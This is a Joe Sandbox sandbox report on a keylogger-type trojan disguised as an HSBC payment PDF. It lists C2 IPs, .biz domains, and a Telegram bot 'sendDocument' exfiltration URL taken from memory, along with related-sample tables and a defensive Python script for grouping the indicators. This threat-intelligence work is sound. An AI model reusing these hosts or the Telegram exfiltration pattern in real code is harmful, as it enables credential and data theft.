http://18.141.10.107/ | armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538967838.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://82.112.184.197/hncx | armsvc.exe, 00000004.00000003.1992970471.0000000000873000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://scss.adobesc.com | AdobeCollabSync.exe.4.dr | false | - | high
https://scss.adobesc.com0 | AdobeCollabSync.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://scss.adobesc.comAcroCoreSyncSharedReviewLoggingEnabledAcrobat_DesktopUserhttps://comments.ad | AdobeCollabSync.exe.4.dr | false | Avira URL Cloud: safe | unknown
http://ww99.przvgke.biz/opymuwnb | armsvc.exe, 00000004.00000003.1501939823.00000000008A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://checkip.dyndns.org/q | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | - | high
http://reallyfreegeoip.org | RegSvcs.exe, 00000005.00000002.2636185001.00000000027E2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com | AdobeCollabSync.exe.4.dr | false | Avira URL Cloud: safe | unknown
https://scss.adobesc.comemptyAnnotations | AdobeCollabSync.exe.4.dr | false | Avira URL Cloud: safe | unknown
http://172.234.222.138/ | armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://54.244.188.177/mgppdv | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346799710.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.com | RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://44.221.84.105/bd | armsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000005.00000002.2636185001.0000000002741000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://82.112.184.197/OV | armsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://54.244.188.177/ | armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://44.221.84.105/ | armsvc.exe, 00000004.00000003.1432419986.0000000000865000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe |
                                                                                                                                unknown
                                                                                                                                http://54.244.188.177/I$oHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://reallyfreegeoip.org/xml/HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFListAdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://scss.adobesc.comKAdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://scss.adobesc.comcommandNameAdd_AnnotsDelete_AnnotsUpdate_AnnotsEurekaReviewFetchReviewUpdateAdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.AdobeCollabSync.exe.4.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000005.00000002.2636185001.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzU4NWQyYmRmarmsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    https://pcnatrk.net/track.armsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://172.234.222.138/3VX&armsvc.exe, 00000004.00000003.1501706102.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://scss.adobesc.comReadStatusAdobeCollabSync.exe.4.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachineAdobeCollabSync.exe.4.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://reallyfreegeoip.orgRegSvcs.exe, 00000005.00000002.2636185001.00000000027C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.winimage.com/zLibDllarmsvc.exe, 00000004.00000003.1693479400.0000000001F90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://18.141.10.107/3VX&armsvc.exe, 00000004.00000003.1382519180.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://54.244.188.177:80/mgppdvHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000B93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://18.141.10.107/tydyiliq1armsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://18.141.10.107/tydyiliqarmsvc.exe, 00000004.00000003.1538799340.0000000000873000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://82.112.184.197/fprrydnqfscclarmsvc.exe, 00000004.00000003.1992416564.000000000087B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://api.telegram.orgRegSvcs.exe, 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://54.244.188.177/3VX&armsvc.exe, 00000004.00000003.1354308285.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://ww12.przvgke.biz/armsvc.exe, 00000004.00000003.1501311933.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://api.telegram.org/bot-/sendDocument?chat_id=HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizarmsvc.exe, 00000004.00000003.1488845823.0000000002370000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1488451296.0000000002050000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://82.112.184.197/armsvc.exe, 00000004.00000003.1992970471.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572492
Start date and time: 2024-12-10 16:23:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@20/165@24/13
EGA Information:
• Successful, ratio: 88.9%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, SearchIndexer.exe, SearchProtocolHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiApSrv.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target armsvc.exe, PID 6336, because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Time     | Type            | Description
10:24:13 | API Interceptor | 14x Sleep call for process: armsvc.exe modified
10:24:21 | API Interceptor | 83100x Sleep call for process: perfhost.exe modified
10:24:23 | API Interceptor | 239435x Sleep call for process: RegSvcs.exe modified
11:33:06 | API Interceptor | 200x Sleep call for process: msdtc.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
193.122.6.168 | New_Order_List.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | file.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | Payment Confirmation..docm | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | 1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | Lenticels.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | SIPARIS TEYIT FORMU VE PROFORMA FATURA.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | Bank Swift and SOA PRN00720031415453_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.6.168 | QUOTATION_DECQTRA071244PDF.scr.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | QUOTATION_DECQTRA071244 PDF.scr.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
172.234.222.143 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | przvgke.biz/fauopp
172.234.222.143 | invoice_96.73.exe | malicious | FormBook | fwiwk.biz/kbtuvb
172.234.222.143 | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | fwiwk.biz/lrhpwoxhabbo
172.234.222.143 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | przvgke.biz/dadmwtnbmefxvi
172.234.222.143 | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | fwiwk.biz/mhwavs
172.234.222.143 | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | fwiwk.biz/jwvwqanfys
172.234.222.143 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | htwqzczce.biz/qccuqoixlchlyacl
172.234.222.143 | AENiBH7X1q.exe | malicious | PureLog Stealer, RedLine | fwiwk.biz/t
172.234.222.143 | E_dekont.cmd | malicious | DBatLoader, Nitol, PureLog Stealer, XWorm | fwiwk.biz/fvthsigvq
172.234.222.143 | Y2EM7suNV5.exe | malicious | MassLogger RAT | fwiwk.biz/hbfipefumdnnq
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
przvgke.biz | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.138
przvgke.biz | invoice_96.73.exe | malicious | FormBook | 172.234.222.143
przvgke.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 172.234.222.143
przvgke.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
przvgke.biz | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.143
przvgke.biz | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
przvgke.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
przvgke.biz | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.138
ssbzmoy.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | invoice_96.73.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
knjghuig.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 18.141.10.107
knjghuig.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
knjghuig.biz | invoice_96.73.exe | malicious | FormBook | 18.141.10.107
knjghuig.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
knjghuig.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
knjghuig.biz | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
knjghuig.biz | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
knjghuig.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
knjghuig.biz | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
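The IP and domain match tables above pair each indicator this sample contacted with other submissions that touched the same indicator, and with the URL or resolution seen in that submission. The Python below is an added example for reading them, not code from Joe Sandbox or from the sample. It transcribes a constructed subset of the rows above, treats checkip.dyndns.org as a public IP-echo service (an analyst assumption, held in GENERIC_SERVICES), and then ranks the indicators for triage: shared tooling is separated from operator infrastructure, and the domain-to-IP edges implied by both tables are recovered so that domains sitting on the same hosts can be grouped.

```python
"""Pivot Joe Sandbox 'Associated Sample' match rows onto shared infrastructure.

Added example for reading this report, not Joe Sandbox's or the sample's code.
MATCH_ROWS is a subset transcribed from the IP and domain match tables
(constructed for the example); the analysis functions are the point.
"""
from collections import Counter, defaultdict

# Public IP-echo services.  Analyst assumption: an indicator whose only
# recorded context is one of these is shared tooling, not operator C2.
GENERIC_SERVICES = {"checkip.dyndns.org"}

# (indicator, kind, associated sample, threat names, context)
MATCH_ROWS = [
    ("193.122.6.168", "ip", "New_Order_List.exe", "Snake Keylogger", "checkip.dyndns.org/"),
    ("193.122.6.168", "ip", "SIPARIS TEYIT FORMU VE PROFORMA FATURA.exe", "MassLogger RAT", "checkip.dyndns.org/"),
    ("193.122.6.168", "ip", "Bank Swift and SOA PRN00720031415453_pdf.exe", "GuLoader, MassLogger RAT", "checkip.dyndns.org/"),
    ("193.122.6.168", "ip", "TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exe", "Snake Keylogger, VIP Keylogger", "checkip.dyndns.org/"),
    ("172.234.222.143", "ip", "PURCHASE REQUIRED DETAILS 000487958790903403.exe", "DBatLoader, MassLogger RAT, PureLog Stealer", "przvgke.biz/fauopp"),
    ("172.234.222.143", "ip", "invoice_96.73.exe", "FormBook", "fwiwk.biz/kbtuvb"),
    ("172.234.222.143", "ip", "Order SMG 201906 20190816order.pdf.scr.exe", "AgentTesla, MassLogger RAT, PureLog Stealer", "fwiwk.biz/lrhpwoxhabbo"),
    ("172.234.222.143", "ip", "Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd", "AgentTesla, DBatLoader, PureLog Stealer", "htwqzczce.biz/qccuqoixlchlyacl"),
    ("172.234.222.143", "ip", "E_dekont.cmd", "DBatLoader, Nitol, PureLog Stealer, XWorm", "fwiwk.biz/fvthsigvq"),
    ("przvgke.biz", "domain", "RFQ_PO N89397-GM7287-Order.bat.exe", "MassLogger RAT, PureLog Stealer", "172.234.222.138"),
    ("przvgke.biz", "domain", "invoice_96.73.exe", "FormBook", "172.234.222.143"),
    ("przvgke.biz", "domain", "Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd", "AgentTesla, DBatLoader, PureLog Stealer", "172.234.222.138"),
    ("ssbzmoy.biz", "domain", "RFQ _ Virtue 054451000085.exe", "FormBook", "18.141.10.107"),
    ("ssbzmoy.biz", "domain", "Ziraat_Swift.hta", "MassLogger RAT, PureLog Stealer", "18.141.10.107"),
    ("knjghuig.biz", "domain", "PURCHASE REQUIRED DETAILS 000487958790903403.exe", "DBatLoader, MassLogger RAT, PureLog Stealer", "18.141.10.107"),
    ("knjghuig.biz", "domain", "IBKB.vbs", "AgentTesla, DBatLoader, PureLog Stealer", "18.141.10.107"),
]


def families(threat_names):
    """Split the comma-joined 'Threat Name' cell into a set of family names."""
    return {t.strip() for t in threat_names.split(",") if t.strip()}


def context_host(context):
    """Reduce a context cell ('fwiwk.biz/kbtuvb', '18.141.10.107') to its host."""
    return context.split("/", 1)[0]


def family_counts(rows):
    """indicator -> Counter of families among the samples that touched it."""
    counts = defaultdict(Counter)
    for indicator, _, _, threats, _ in rows:
        counts[indicator].update(families(threats))
    return counts


def pivot_quality(rows):
    """'generic' if every context is a public IP-echo service, else 'infrastructure'."""
    hosts = defaultdict(set)
    for indicator, _, _, _, context in rows:
        hosts[indicator].add(context_host(context))
    return {i: "generic" if h <= GENERIC_SERVICES else "infrastructure"
            for i, h in hosts.items()}


def domain_ip_edges(rows):
    """(domain, ip) pairs: an IP row's context is the URL fetched from that IP,
    a domain row's context is the IP the domain resolved to."""
    edges = set()
    for indicator, kind, _, _, context in rows:
        host = context_host(context)
        if kind == "ip" and host not in GENERIC_SERVICES:
            edges.add((host, indicator))
        elif kind == "domain":
            edges.add((indicator, host))
    return edges


def ips_for_domain(rows):
    """domain -> sorted IPs it has been observed on, across both tables."""
    out = defaultdict(set)
    for dom, ip in domain_ip_edges(rows):
        out[dom].add(ip)
    return {d: sorted(v) for d, v in out.items()}


def triage_order(rows):
    """Indicators to act on first: real infrastructure, most families first."""
    quality, counts = pivot_quality(rows), family_counts(rows)
    return sorted(counts, key=lambda i: (quality[i] != "infrastructure", -len(counts[i]), i))


if __name__ == "__main__":
    quality, counts = pivot_quality(MATCH_ROWS), family_counts(MATCH_ROWS)
    for ind in triage_order(MATCH_ROWS):
        print(f"{ind:16} {quality[ind]:15} {sorted(counts[ind])}")
    for dom, ips in sorted(ips_for_domain(MATCH_ROWS).items()):
        print(f"{dom:14} -> {', '.join(ips)}")
```

Run against the subset, the ranking puts 172.234.222.143 and the three .biz domains ahead of 193.122.6.168: every row for that address has checkip.dyndns.org as its only context, so its overlap with Snake Keylogger and MassLogger submissions more likely reflects a shared IP-check habit than shared command-and-control. The domain-to-IP map shows przvgke.biz observed on both 172.234.222.138 and 172.234.222.143 while ssbzmoy.biz and knjghuig.biz share 18.141.10.107, which is the cluster an analyst would block or watch rather than the individual URL paths.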
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | New_Order_List.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | Request for Quotation_10.12.2024.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | SALARY_RECEIPT.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | FATR98765678000.doc | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 158.101.44.242
ORACLE-BMC-31898US | rebirth.mpsl.elf | malicious | Mirai, Okiru | 193.123.195.134
ORACLE-BMC-31898US | rPurchaseOrder_PO19202409.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | la.bot.mipsel.elf | malicious | Mirai | 168.139.191.161
ORACLE-BMC-31898US | la.bot.arm5.elf | malicious | Mirai | 138.1.36.103
LIQUIDWEBUS | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 72.52.179.174
LIQUIDWEBUS | akcqrfutuo.elf | malicious | Unknown | 67.225.207.146
LIQUIDWEBUS | xobftuootu.elf | malicious | Unknown | 67.225.254.236
LIQUIDWEBUS | http://editableslides.co | malicious | HTMLPhisher, TechSupportScam | 67.227.216.154
LIQUIDWEBUS | https://bielefelde.de/ | malicious | Unknown | 72.52.179.174
LIQUIDWEBUS | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 72.52.179.174
LIQUIDWEBUS | la.bot.mipsel.elf | malicious | Mirai | 173.199.128.107
LIQUIDWEBUS | sora.ppc.elf | malicious | Mirai | 69.167.163.83
LIQUIDWEBUS | x86.elf | malicious | Mirai | 173.199.168.208
LIQUIDWEBUS | https://simplebooklet.com | malicious | Unknown | 72.52.250.19
AKAMAI-ASN1EU | http://abercombie.com | malicious | Unknown | 23.195.38.175
AKAMAI-ASN1EU | https://listafrica.org/Receipt.html | malicious | WinSearchAbuse | 23.195.39.65
AKAMAI-ASN1EU | ro7MnkIxJk.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | hQ3bNN05F8.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | FtbY5uqGY0.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | x1e7BlMmbl.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 8E273IHyAW.exe | malicious | LummaC Stealer | 23.55.153.106
AKAMAI-ASN1EU | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 172.234.222.143
AKAMAI-ASN1EU | la.bot.arm6.elf | malicious | Mirai | 165.254.13.47
AKAMAI-ASN1EU | https://quiet-sun-5d9f.atmos4.workers.dev/login | malicious | Unknown | 23.215.17.144
AKAMAI-ASN1EU | http://abercombie.com | malicious | Unknown | 23.195.38.175
AKAMAI-ASN1EU | https://listafrica.org/Receipt.html | malicious | WinSearchAbuse | 23.195.39.65
AKAMAI-ASN1EU | ro7MnkIxJk.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | hQ3bNN05F8.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | FtbY5uqGY0.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | x1e7BlMmbl.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 8E273IHyAW.exe | malicious | LummaC Stealer |
                                                                                                                                                  • 23.55.153.106
                                                                                                                                                  PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                  • 172.234.222.143
                                                                                                                                                  la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 165.254.13.47
                                                                                                                                                  https://quiet-sun-5d9f.atmos4.workers.dev/loginGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.215.17.144
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
ST07933.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
New_Order_List.exe | malicious | Snake Keylogger | 104.21.67.152
Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 104.21.67.152
ORDER-6070Y689_0PF57682456_DECVC789378909740.js | malicious | WSHRat, Snake Keylogger | 104.21.67.152
Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
E-dekont.exe | malicious | MassLogger RAT | 104.21.67.152
Hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | 104.21.67.152
10122024Hesap hareketleriniz.exe | malicious | Snake Keylogger | 104.21.67.152

Match: 3b5074b1b5d032e5620f69f9f700ff0e
ST07933.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Ref_31020563.exe | malicious | Unknown | 149.154.167.220
Ref_31020563.exe | malicious | Unknown | 149.154.167.220
xUPaeKk5wQ.msi | malicious | AteraAgent | 149.154.167.220
7gBUqzSN3y.msi | malicious | AteraAgent | 149.154.167.220
PO-8776-2024.js | malicious | Remcos | 149.154.167.220
New Order Enquiry.js | malicious | AgentTesla | 149.154.167.220
Bunker_STS_pdf.vbs | malicious | Unknown | 149.154.167.220
Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220

No context
